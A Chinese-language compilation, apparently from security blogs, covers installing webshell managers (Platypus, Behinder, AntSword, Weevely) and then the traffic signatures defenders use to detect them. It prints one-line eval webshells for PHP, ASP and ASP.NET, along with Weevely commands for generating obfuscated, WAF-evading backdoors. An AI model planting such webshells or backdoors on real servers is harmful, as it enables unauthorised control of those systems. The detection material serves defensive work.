WebShell客户端是一种用于服务器上WebShell后门与攻击客户端之间进行通信的程序，我们通常可以根据WebShell客户端的流量来判断服务器上是否存在WebShell后门。【注：本机安装环境为Ubuntu 20.04.2 LTS】

1. Platypus

        Platypus 是一款支持多会话的交互式反向 Shell 管理器。

        在实际的渗透测试中，为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能（如：交互式 Shell、文件操作、隧道等），可以更方便灵活地对反向 Shell 会话进行管理。

下载地址：https://github.com/WangYihang/Platypus

推荐使用二进制文件运行，在下载文件夹内直接运行 ./platypus_linux_amd64  （注：x86架构）

中文文档：https://platypus-reverse-shell.vercel.app/

2.冰蝎（behinder）

运行环境

客户端环境：jre6~jre8（需要注意）
服务端：.net 2.0+; php 5.4-7.2; java 6+

安装java环境（有则忽略）

为了方便我们直接安装JDK，Ubuntu下有一款开源的jdk：openjdk ，使用下面命令即可安装

sudo apt update

sudo apt-get install openjdk-8-jdk

安装完测试一下，打印出java版本即可

java -version

下载地址：

Github官网:https://github.com/rebeyond/Behinder 

下载：https://github.com/rebeyond/Behinder/releases 

下载Behinder_v2.0.1.zip，解压在冰蝎目录下输入运行即可

 java -jar Behinder.jar

3.蚁剑

         中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。

官方github下载地址：https://github.com/AntSwordProject/ 

注意：我们下载的时候需要下载两个部分，一个是项目核心源码”antSword“，另一个是加载器，加载器则分为三个版本：Mac、Windows、Linux。

1、解压  AntSword-Loader-v4.0.3-linux-x64.zip

2、进入 AntSword-Loader-v4.0.3-linux-x64 目录

（1）设置可执行权限：chmod 777 AntSword

（2）启动蚁剑：./AntSword

2.2 点击初始化

然后选择 antsword源码 的目录（不是加载器目录！！！）

初始化完毕后，会自动关闭 再启动就好了！！！

参考教程：

原文链接：https://blog.csdn.net/qq_42342141/article/details/114270489

kali下的webshell工具-Weevely

weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强，而且使用加密连接，往往能轻松突破WAF拦截。

Weevely工具使用Python语言编写，集生成木马与连接于一身，相当于Linux中的中国菜刀，但只适用于php网站，支持图片与.htaccess两种绕过方式。生成的木马文件进行了base64加密处理。它实现了SSH 风格的终端界面，并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透;

1. 生成后门：

weevely generate password path filename

password为生成后门的密码，path为生成路径；

2. 连接后门

weevely generate 后门URL 后门pass

建立连接后常用命令：

-audit.phpconf【查看php相关信息】
-system_info【查看系统信息】
-net_ifconfig【获取网卡信息】
–PS：ifconfig主要是针对Linux操作系统，要灵活应用。如果是Win系统可以直接使用ipconfig查看。
-file_ls【列出目录中内容】
-file_read【读取文件信息】
-file_download【下载目标站点文件】

生成Weevely专用的木马

命令格式：weevely generate password path
注意：密码长度最小为4
后门生成（参数）
generate.php（生成php后门文件）
generate.img（将后门代码插入到图片中，并修改.htaccess，该后门需要服务器开启.htaccess）

生成后的PHP后门，是经过base64加密的，将服务端代码分散放入单字符的变量中，同时夹杂大量字符（@.，随机字符）以绕过一些关键词的匹配。将分散的代码按顺序拼接，再使用str_replace去掉无用字符，最后由create_function创建匿名函数执行。

weevely三个参数：

Terminal：运行一个终端窗口
Session：恢复现有的会话
Generate：创建后门文件

对目标运行一个终端：
weevely URL password [CMD]
命令为可选项，可建立终端后输入
读取会话文件：
weevely session path [CMD]
生成一个webshell：
weevely generate password path

例如： 生成一个webshell：

首先生成一个webshell文件
如果不指定路径，则生成的文件默认存放在weevely的软件目录下(/usr/share/weevely)；

查看生成的webshell文件：

可以看到weevely生成的webshell内容是经过特殊方式混淆处理的，无法直观的查看代码内容；

回到weevely连接上传的webshell：
命令： weevely url/uploads/test.php password

成功建立了一个会话，weevely会保存对应的session文件在/root/.weevely/sessions下的主机目录里;

可以对服务器进行控制，若是简单的操作服务器，可以直接在窗口输入命令：pwd,ls等等；

对目标运行一个终端：

weevely URL password [CMD]

读取会话文件：

weevely session path [CMD]

主要特点：

· 隐蔽的类终端的PHP webshell

· 30多个管理模块

. 执行系统命令、浏览文件系统

. 检查目标服务器的常见配置错误

. 基于现有连接，创建正向、反向的TCP shell连接

. 通过目标机器代理HTTP流量

. 从目标计算机运行端口扫描，渗透内网

0x00 前言

使用各种的shell工具获取到目标权限，即可进行数据操作，今天来简要分析一下目前常使用的各类shell管理工具的流量特诊，帮助蓝队同学在风险识别上快速初值

0x01 中国菜刀流量分析

payload特征：
PHP: <?php @eval($_POST['caidao']);?>

ASP: <%eval request(“caidao”)%>

ASP.NET: <%@ Page
Language=“Jscript”%><%eval(Request.Item[“caidao”],“unsafe”);%>

数据包流量特征：
1，请求包中：ua头为百度，火狐
2，请求体中存在eavl，base64等特征字符
3，请求体中传递的payload为base64编码，并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

0x02 蚂蚁宝剑流量分析

payload特征：
Php中使用assert，eval执行,
asp 使用eval
在jsp使用的是Java类加载（ClassLoader）,同时会带有base64编码解码等字符特征

数据包流量特征：
使用普通的一句话都存在以下特征：
每个请求体都存在@ini_set(“display_errors”, “0”);@set_time_limit(0)开头。并且后面存在base64等字符
响应包的结果返回格式为：
随机数
响应内容
随机数

使用base64加密的payload，数据包存在以下base加密的eval命令执行，数据包的payload内容存在几个分段内容，分别都使用base加密，解密后可以看到相关的路径，命令等
响应包的结果返回格式为：
随机数
编码后的结果
随机数

0x03 冰蝎流量分析

paylaod分析：
php在代码中同样会存在eval或assert等字符特征

在aps中会在for循环进行一段异或处理

在jsp中则利用java的反射，所以会存在ClassLoader，getClass().getClassLoader()等字符特征

冰蝎2.0流量特征：
第一阶段请求中返回包状态码为200，返回内容必定是16位的密钥
请求包存在：Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

建立连接后的cookie存在特征字符
所有请求 Cookie的格式都为: Cookie: PHPSESSID=; path=/；

冰蝎3.0流量特征：
请求包中content-length 为5740或5720（可能会根据Java版本而改变）
每一个请求头中存在
Pragma: no-cache，Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.9

0x04 哥斯拉流量特征

payload特征：
jsp会出现xc,pass字符和Java反射（ClassLoader，getClass().getClassLoader()），base64加解码等特征
php，asp则为普通的一句话木马

哥斯拉流量分析：
作为参考：
所有请求中Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
所有响应中Cache-Control: no-store, no-cache, must-revalidate,
同时在所有请求中Cookie中后面都存在；特征

参考：https://www.freebuf.com/articles/web/324622.html